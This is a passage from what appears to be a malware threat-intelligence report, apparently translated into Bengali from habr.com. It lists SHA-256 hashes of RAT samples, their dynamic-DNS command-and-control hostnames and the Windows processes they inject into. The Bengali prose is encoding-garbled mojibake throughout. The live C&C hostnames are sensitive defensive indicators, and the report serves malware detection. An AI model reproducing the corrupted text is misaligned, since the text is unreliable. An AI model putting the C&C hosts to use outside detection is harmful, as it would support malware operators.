āĻ•ā§āĻ°āĻŽ āĻ¸āĻžā§āĻšāĻžāĻ˛āĻ¨ āĻ•āĻ°ā§‡āĨ¤ āĻ¤āĻžāĻĻā§‡āĻ° āĻ¸āĻ•āĻ˛ā§‡āĻ‡ āĻāĻ•āĻŸāĻŋ āĻŦāĻŋāĻļā§āĻŦāĻ¸ā§āĻ¤ āĻ‰āĻ‡āĻ¨ā§āĻĄā§‹āĻœ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¯āĻŧ RAT āĻļā§āĻ°ā§‡āĻŖā§€āĻ° āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻ‡āĻ¨āĻœā§‡āĻ•ā§āĻŸ āĻ•āĻ°ā§‡āĨ¤ āĻĄāĻžāĻ¯āĻŧāĻ¨āĻžāĻŽāĻŋāĻ• āĻĄāĻŋāĻāĻ¨āĻāĻ¸ āĻĒāĻ°āĻŋāĻˇā§‡āĻŦāĻžāĻ—ā§āĻ˛āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡ āĻ¤āĻžāĻĻā§‡āĻ° āĻ¸āĻ•āĻ˛ā§‡āĻ° āĻ¸āĻŋ āĻ…ā§āĻ¯āĻžāĻ¨ā§āĻĄ āĻ¸āĻŋ āĻ āĻŋāĻ•āĻžāĻ¨āĻž āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§āĻŋāĻ¤ āĻ°āĻ¯āĻŧā§‡āĻ›ā§‡ā§ˇ

āĻ¯āĻžāĻ‡āĻšā§‹āĻ•, āĻ†āĻŽāĻ°āĻž āĻĻāĻžāĻŦāĻŋ āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°āĻŋ āĻ¨āĻž āĻ¯ā§‡ āĻāĻ‡ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻāĻ•āĻ‡ āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻĻā§‡āĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛, āĻāĻ•āĻ‡ C&C āĻ āĻŋāĻ•āĻžāĻ¨āĻžāĻ—ā§āĻ˛āĻŋāĻ° āĻ¨āĻŽā§āĻ¨āĻžāĻ—ā§āĻ˛āĻŋ āĻŦāĻžāĻĻ āĻĻāĻŋāĻ¯āĻŧā§‡ (āĻ‰āĻĻāĻžāĻšāĻ°āĻŖāĻ¸ā§āĻŦāĻ°ā§‚āĻĒ, kimjoy007.dyndns.org)ā§ˇ

āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧāĻžāĻ°ā§‡āĻ° āĻ¨āĻžāĻŽ

āĻ°āĻ¯āĻŧā§‡āĻ›ā§‡ SHA-256

āĻ¸āĻŋāĻāĻ¨ā§āĻĄāĻ¸āĻŋ

āĻ¯ā§‡ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¯āĻŧ āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻŦāĻžāĻšāĻŋāĻ¤ āĻšāĻ¯āĻŧ

āĻ˛āĻŽā§āĻŦāĻ¨

b4ecd8dbbceaadd482f1b23b712bcddc5464bccaac11fe78ea5fd0ba932a4043

kimjoy007.dyndns.org

svchost

00edb8200dfeee3bdd0086c5e8e07c6056d322df913679a9f22a2b00b836fd72

hope.doomdns.org

svchost

504cbae901c4b3987aa9ba458a230944cb8bd96bbf778ceb54c773b781346146

kimjoy007.dyndns.org

svchost

1487017e087b75ad930baa8b017e8388d1e99c75d26b5d1deec8b80e9333f189

kimjoy007.dyndns.org

svchost

c4160ec3c8ad01539f1c16fb35ed9c8c5a53a8fda8877f0d5e044241ea805891

franco20.dvrdns.org

svchost

515249d6813bb2dde1723d35ee8eb6eeb8775014ca629ede017c3d83a77634ce

kimjoy007.dyndns.org

svchost

1b70f6fee760bcfe0c457f0a85ca451ed66e61f0e340d830f382c5d2f7ab803f

franco20.dvrdns.org

svchost

b2bdffa5853f29c881d7d9bff91b640bc1c90e996f85406be3b36b2500f61aa1

hope.doomdns.org

svchost

c9745a8f33b3841fe7bfafd21ad4678d46fe6ea6125a8fedfcd2d5aee13f1601

kimjoy007.dyndns.org

svchost

1dfc66968527fbd4c0df2ea34c577a7ce7a2ba9b54ba00be62120cc88035fa65

franco20.dvrdns.org

svchost

c6c05f21e16e488eed3001d0d9dd9c49366779559ad77fcd233de15b1773c981

kimjoy007.dyndns.org

cmd āĻ•āĻŽāĻžāĻ¨ā§āĻĄ

3b785cdcd69a96902ee62499c25138a70e81f14b6b989a2f81d82239a19a3aed

hope.doomdns.org

svchost

4d71ceb9d6c53ac356c0f5bdfd1a5b28981061be87e38e077ee3a419e4c476f9

2004para.ddns.net

svchost

00185cc085f284ece264e3263c7771073a65783c250c5fd9afc7a85ed94acc77

hope.doomdns.org

svchost

0342107c0d2a069100e87ef5415e90fd86b1b1b1c975d0eb04ab1489e198fc78

franco20.dvrdns.org

svchost

de33b7a7b059599dc62337f92ceba644ac7b09f60d06324ecf6177fff06b8d10

kimjoy007.dyndns.org

svchost

80a8114d63606e225e620c64ad8e28c9996caaa9a9e87dd602c8f920c2197007

kimjoy007.dyndns.org

svchost

acb157ba5a48631e1f9f269e6282f042666098614b66129224d213e27c1149bb

hope.doomdns.org

cmd āĻ•āĻŽāĻžāĻ¨ā§āĻĄ

bf608318018dc10016b438f851aab719ea0abe6afc166c8aea6b04f2320896d3

franco20.dvrdns.org

svchost

4d0c9b8ad097d35b447d715a815c67ff3d78638b305776cde4d90bfdcb368e38

hope.doomdns.org

svchost

e7c676f5be41d49296454cd6e4280d89e37f506d84d57b22f0be0d87625568ba

kimjoy007.dyndns.org

svchost

9375d54fcda9c7d65f861dfda698e25710fda75b5ebfc7a238599f4b0d34205f

franco20.dvrdns.org

svchost

128367797fdf3c952831c2472f7a308f345ca04aa67b3f82b945cfea2ae11ce5

kimjoy007.dyndns.org

svchost

09bd720880461cb6e996046c7d6a1c937aa1c99bd19582a562053782600da79d

hope.doomdns.org

svchost

0a176164d2e1d5e2288881cc2e2d88800801001d03caedd524db365513e11276

paradickhead.homeip.net

svchost

0af5194950187fd7cbd75b1b39aab6e1e78dae7c216d08512755849c6a0d1cbe

hope.doomdns.org

svchost

Warzone

3786324ce3f8c1ea3784e5389f84234f81828658b22b8a502b7d48866f5aa3d3

kimjoy007.dyndns.org

svchost

db0d5a67a0ced6b2de3ee7d7fc845a34b9d6ca608e5fead7f16c9a640fa659eb

kimjoy007.dyndns.org

svchost

āĻ¨ā§‡āĻŸāĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ°

6dac218f741b022f5cad3b5ee01dbda80693f7045b42a0c70335d8a729002f2d

kimjoy007.dyndns.org

svchost

āĻĄāĻžāĻ°ā§āĻ•āĻŸā§āĻ°ā§āĻ¯āĻžāĻ•

ea64fe672c953adc19553ea3b9118ce4ee88a14d92fc7e75aa04972848472702

kimjoy007.dyndns.org

svchost

WSH RAT

d410ced15c848825dcf75d30808cde7784e5b208f9a57b0896e828f890faea0e

anekesolution.linkpc.net

RegAsm

āĻšā§āĻ¨

896604d27d88c75a475b28e88e54104e66f480bcab89cc75b6cdc6b29f8e438b

softmy.duckdns.org

RegAsm

āĻ•ā§‹āĻ¯āĻŧāĻžāĻ¸āĻžāĻ°āĻ°āĻžāĻŸ

bd1e29e9d17edbab41c3634649da5c5d20375f055ccf968c022811cd9624be57

darkhate-23030.portmap.io

RegAsm

12044aa527742282ad5154a4de24e55c9e1fae42ef844ed6f2f890296122153b

darkhate-23030.portmap.io

RegAsm

be93cc77d864dafd7d8c21317722879b65cfbb3297416bde6ca6edbfd8166572

darkhate-23030.portmap.io

RegAsm

933a136f8969707a84a61f711018cd21ee891d5793216e063ac961b5d165f6c0

darkhate-23030.portmap.io

RegAsm

71dea554d93728cce8074dbdb4f63ceb072d4bb644f0718420f780398dafd943

chrom1.myq-see.com

RegAsm

0d344e8d72d752c06dc6a7f3abf2ff7678925fde872756bf78713027e1e332d5

darkhate-23030.portmap.io

RegAsm

0ed7f282fd242c3f2de949650c9253373265e9152c034c7df3f5f91769c6a4eb

darkhate-23030.portmap.io

RegAsm

aabb6759ce408ebfa2cc57702b14adaec933d8e4821abceaef0c1af3263b1bfa

darkhate-23030.portmap.io

RegAsm

1699a37ddcf4769111daf33b7d313cf376f47e92f6b92b2119bd0c860539f745

darkhate-23030.portmap.io

RegAsm

3472597945f3bbf84e735a778fd75c57855bb86aca9b0a4d0e4049817b508c8c

darkhate-23030.portmap.io

RegAsm

809010d8823da84cdbb2c8e6b70be725a6023c381041ebda8b125d1a6a71e9b1

darkhate-23030.portmap.io

RegAsm

4217a2da69f663f1ab42ebac61978014ec4f562501efb2e040db7ebb223a7dff

darkhate-23030.portmap.io

RegAsm

08f34b3088af792a95c49bcb9aa016d4660609409663bf1b51f4c331b87bae00

darkhate-23030.portmap.io

RegAsm

79b4efcce84e9e7a2e85df7b0327406bee0b359ad1445b4f08e390309ea0c90d

darkhate-23030.portmap.io

RegAsm

12ea7ce04e0177a71a551e6d61e4a7916b1709729b2d3e9daf7b1bdd0785f63a

darkhate-23030.portmap.io

RegAsm

d7b8eb42ae35e9cc46744f1285557423f24666db1bde92bf7679f0ce7b389af9

darkhate-23030.portmap.io

RegAsm

def09b0fed3360c457257266cb851fffd8c844bc04a623c210a2efafdf000d5c

darkhate-23030.portmap.io

RegAsm

50119497c5f919a7e816a37178d28906fb3171b07fc869961ef92601ceca4c1c

darkhate-23030.portmap.io

RegAsm

ade5a2f25f603bf4502efa800d3cf5d19d1f0d69499b0f2e9ec7c85c6dd49621

darkhate-23030.portmap.io

RegAsm

189d5813c931889190881ee34749d390e3baa80b2c67b426b10b3666c3cc64b7

darkhate-23030.portmap.io

RegAsm

c3193dd67650723753289a4aebf97d4c72a1afe73c7135bee91c77bdf1517f21

darkhate-23030.portmap.io

RegAsm

a6f814f14698141753fc6fb7850ead9af2ebcb0e32ab99236a733ddb03b9eec2

darkhate-23030.portmap.io

RegAsm

a55116253624641544175a30c956dbd0638b714ff97b9de0e24145720dcfdf74

darkhate-23030.portmap.io

RegAsm

d6e0f0fb460d9108397850169112bd90a372f66d87b028e522184682a825d213

darkhate-23030.portmap.io

RegAsm

522ba6a242c35e2bf8303e99f03a85d867496bbb0572226e226af48cc1461a86

darkhate-23030.portmap.io

RegAsm

fabfdc209b02fe522f81356680db89f8861583da89984c20273904e0cf9f4a02

darkhate-23030.portmap.io

RegAsm

08ec13b7da6e0d645e4508b19ba616e4cf4e0421aa8e26ac7f69e13dc8796691

darkhate-23030.portmap.io

RegAsm

8433c75730578f963556ec99fbc8d97fa63a522cef71933f260f385c76a8ee8d

darkhate-23030.portmap.io

RegAsm

99f6bfd9edb9bf108b11c149dd59346484c7418fc4c455401c15c8ac74b70c74

darkhate-23030.portmap.io

RegAsm

d13520e48f0ff745e31a1dfd6f15ab56c9faecb51f3d5d3d87f6f2e1abe6b5cf

darkhate-23030.portmap.io

RegAsm

9e6978b16bd52fcd9c331839545c943adc87e0fbd7b3f947bab22ffdd309f747

darkhate-23030.portmap.io

RegAsm⁠

āĻ‰āĻ¤ā§āĻ¸: www.habr.com

āĻāĻ•āĻŸāĻŋ āĻŽāĻ¨ā§āĻ¤āĻŦā§āĻ¯ āĻœā§āĻĄāĻŧā§āĻ¨